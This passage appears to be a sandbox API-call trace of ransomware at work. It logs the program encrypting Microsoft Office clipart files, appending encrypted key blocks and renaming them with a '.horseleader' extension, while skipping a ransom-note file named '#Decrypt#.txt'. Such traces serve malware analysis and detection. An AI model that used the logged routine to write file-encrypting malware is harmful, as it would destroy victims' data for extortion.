lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.787] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.787] CloseHandle (hObject=0x158) returned 1 [0253.788] GetProcessHeap () returned 0x780000 [0253.788] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.788] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF.horseleader") returned 79 [0253.788] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01637_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01637_.wmf.horseleader")) returned 1 [0253.789] GetProcessHeap () returned 0x780000 [0253.789] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.789] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd16ae900, ftCreationTime.dwHighDateTime=0x1bd4bcf, ftLastAccessTime.dwLowDateTime=0x51aadd90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd16ae900, ftLastWriteTime.dwHighDateTime=0x1bd4bcf, nFileSizeHigh=0x0, nFileSizeLow=0x292a, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS01638_.WMF", cAlternateFileName="")) returned 1 [0253.789] lstrcmpiW (lpString1="BS01638_.WMF", lpString2="Windows") returned -1 [0253.789] 
wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 67 [0253.789] StrStrIW (lpFirst="BS01638_.WMF", lpSrch=".horseleader") returned 0x0 [0253.789] lstrcmpW (lpString1="BS01638_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.789] lstrcmpW (lpString1="BS01638_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.789] lstrlenW (lpString=".testttjffg") returned 11 [0253.789] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.789] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.789] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.789] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01638_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.790] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 67 [0253.790] StrStrW (lpFirst="BS01638_.WMF", lpSrch=".txt") returned 0x0 [0253.790] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=10538) returned 1 [0253.790] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x292a, lpOverlapped=0x0) returned 1 [0253.793] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd6d6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) 
returned 1 [0253.793] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x292a, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x292a, lpOverlapped=0x0) returned 1 [0253.793] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.793] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.794] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.794] CloseHandle (hObject=0x158) returned 1 [0253.794] GetProcessHeap () returned 0x780000 [0253.794] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.794] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF.horseleader") returned 79 [0253.794] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01638_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01638_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01638_.wmf.horseleader")) returned 1 [0253.795] GetProcessHeap () returned 0x780000 [0253.795] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.795] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88c32800, 
ftCreationTime.dwHighDateTime=0x1bd4bef, ftLastAccessTime.dwLowDateTime=0x51aadd90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x88c32800, ftLastWriteTime.dwHighDateTime=0x1bd4bef, nFileSizeHigh=0x0, nFileSizeLow=0x108c, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BS01639_.WMF", cAlternateFileName="")) returned 1 [0253.795] lstrcmpiW (lpString1="BS01639_.WMF", lpString2="Windows") returned -1 [0253.795] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 67 [0253.795] StrStrIW (lpFirst="BS01639_.WMF", lpSrch=".horseleader") returned 0x0 [0253.795] lstrcmpW (lpString1="BS01639_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.796] lstrcmpW (lpString1="BS01639_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.796] lstrlenW (lpString=".testttjffg") returned 11 [0253.796] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.796] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.796] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.796] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01639_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.797] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 67 [0253.797] StrStrW (lpFirst="BS01639_.WMF", lpSrch=".txt") returned 0x0 [0253.797] GetFileSizeEx (in: hFile=0x158, 
lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=4236) returned 1 [0253.797] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x108c, lpOverlapped=0x0) returned 1 [0253.800] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffef74, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.800] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x108c, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x108c, lpOverlapped=0x0) returned 1 [0253.800] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.800] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.800] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.800] CloseHandle (hObject=0x158) returned 1 [0253.800] GetProcessHeap () returned 0x780000 [0253.801] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.801] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF.horseleader") returned 79 [0253.801] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01639_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft 
Office\\CLIPART\\PUB60COR\\BS01639_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01639_.wmf.horseleader")) returned 1 [0253.802] GetProcessHeap () returned 0x780000 [0253.802] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.802] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x51c50cb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x246a, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="CARBN_01.MID", cAlternateFileName="")) returned 1 [0253.802] lstrcmpiW (lpString1="CARBN_01.MID", lpString2="Windows") returned -1 [0253.802] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 67 [0253.802] StrStrIW (lpFirst="CARBN_01.MID", lpSrch=".horseleader") returned 0x0 [0253.802] lstrcmpW (lpString1="CARBN_01.MID", lpString2="#Decrypt#.txt") returned 1 [0253.802] lstrcmpW (lpString1="CARBN_01.MID", lpString2="_uninstalling_.png") returned 1 [0253.802] lstrlenW (lpString=".testttjffg") returned 11 [0253.802] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID", lpSrch=".testttjffg") returned 0x0 [0253.803] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.803] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.803] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID" 
(normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\carbn_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.803] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 67 [0253.803] StrStrW (lpFirst="CARBN_01.MID", lpSrch=".txt") returned 0x0 [0253.803] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=9322) returned 1 [0253.803] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x246a, lpOverlapped=0x0) returned 1 [0253.805] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffdb96, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.805] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x246a, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x246a, lpOverlapped=0x0) returned 1 [0253.806] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.806] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.806] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.806] CloseHandle (hObject=0x158) returned 1 [0253.806] GetProcessHeap () returned 0x780000 [0253.806] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 
[0253.807] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID.horseleader") returned 79 [0253.807] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\carbn_01.mid"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\carbn_01.mid.horseleader")) returned 1 [0253.808] GetProcessHeap () returned 0x780000 [0253.808] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.808] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xceceee00, ftCreationTime.dwHighDateTime=0x1c9b81d, ftLastAccessTime.dwLowDateTime=0x60382570, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xceceee00, ftLastWriteTime.dwHighDateTime=0x1c9b81d, nFileSizeHigh=0x0, nFileSizeLow=0xdec, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="CG1606.WMF", cAlternateFileName="")) returned 1 [0253.808] lstrcmpiW (lpString1="CG1606.WMF", lpString2="Windows") returned -1 [0253.808] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF") returned 65 [0253.808] StrStrIW (lpFirst="CG1606.WMF", lpSrch=".horseleader") returned 0x0 [0253.808] lstrcmpW (lpString1="CG1606.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.808] lstrcmpW (lpString1="CG1606.WMF", lpString2="_uninstalling_.png") returned 1 [0253.808] lstrlenW (lpString=".testttjffg") returned 11 [0253.808] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF", lpSrch=".testttjffg") returned 0x0 
[0253.808] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.809] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.809] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cg1606.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.810] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF") returned 65 [0253.810] StrStrW (lpFirst="CG1606.WMF", lpSrch=".txt") returned 0x0 [0253.810] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3564) returned 1 [0253.810] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xdec, lpOverlapped=0x0) returned 1 [0253.813] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff214, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.813] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xdec, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xdec, lpOverlapped=0x0) returned 1 [0253.813] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.813] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.813] 
WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.813] CloseHandle (hObject=0x158) returned 1 [0253.814] GetProcessHeap () returned 0x780000 [0253.814] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.814] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF.horseleader") returned 77 [0253.814] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cg1606.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CG1606.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cg1606.wmf.horseleader")) returned 1 [0253.815] GetProcessHeap () returned 0x780000 [0253.815] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.815] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x51c76e10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x976, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="CLASSIC1.WMF", cAlternateFileName="")) returned 1 [0253.815] lstrcmpiW (lpString1="CLASSIC1.WMF", lpString2="Windows") returned -1 [0253.815] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 67 [0253.815] StrStrIW (lpFirst="CLASSIC1.WMF", 
lpSrch=".horseleader") returned 0x0 [0253.815] lstrcmpW (lpString1="CLASSIC1.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.815] lstrcmpW (lpString1="CLASSIC1.WMF", lpString2="_uninstalling_.png") returned 1 [0253.816] lstrlenW (lpString=".testttjffg") returned 11 [0253.816] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF", lpSrch=".testttjffg") returned 0x0 [0253.816] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.816] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.816] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\classic1.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.817] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 67 [0253.817] StrStrW (lpFirst="CLASSIC1.WMF", lpSrch=".txt") returned 0x0 [0253.817] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2422) returned 1 [0253.817] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x976, lpOverlapped=0x0) returned 1 [0253.820] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff68a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.820] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x976, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x976, 
lpOverlapped=0x0) returned 1 [0253.820] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.820] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.820] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.820] CloseHandle (hObject=0x158) returned 1 [0253.820] GetProcessHeap () returned 0x780000 [0253.820] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.820] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF.horseleader") returned 79 [0253.820] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\classic1.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\classic1.wmf.horseleader")) returned 1 [0253.822] GetProcessHeap () returned 0x780000 [0253.822] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.822] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x603a86d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, 
nFileSizeLow=0x8d6, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="CLASSIC2.WMF", cAlternateFileName="")) returned 1 [0253.822] lstrcmpiW (lpString1="CLASSIC2.WMF", lpString2="Windows") returned -1 [0253.822] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 67 [0253.822] StrStrIW (lpFirst="CLASSIC2.WMF", lpSrch=".horseleader") returned 0x0 [0253.822] lstrcmpW (lpString1="CLASSIC2.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.822] lstrcmpW (lpString1="CLASSIC2.WMF", lpString2="_uninstalling_.png") returned 1 [0253.822] lstrlenW (lpString=".testttjffg") returned 11 [0253.822] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft 